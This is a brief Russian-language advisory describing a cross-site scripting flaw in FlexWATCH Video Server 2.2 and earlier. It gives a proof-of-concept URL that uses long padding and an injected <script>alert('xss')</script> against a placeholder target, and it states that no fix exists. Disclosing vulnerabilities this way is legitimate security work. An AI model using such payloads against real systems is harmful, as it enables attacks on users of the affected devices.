Межсайтовый скриптинг в FlexWATCH video servers

Дата публикации:
25.02.2004
Всего просмотров:
698
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: FlexWATCH Video Server 2.2 и более ранние версии

Описание: Уязвимость обнаружена в FlexWATCH video servers. Удаленный пользовательможет выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('xss')</script>

URL производителя: http://www.flexwatch.com/products/fw_nvs.asp

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: FlexWATCH-Webs 2.2 (NTSC) Authorization Bypass

или введите имя

CAPTCHA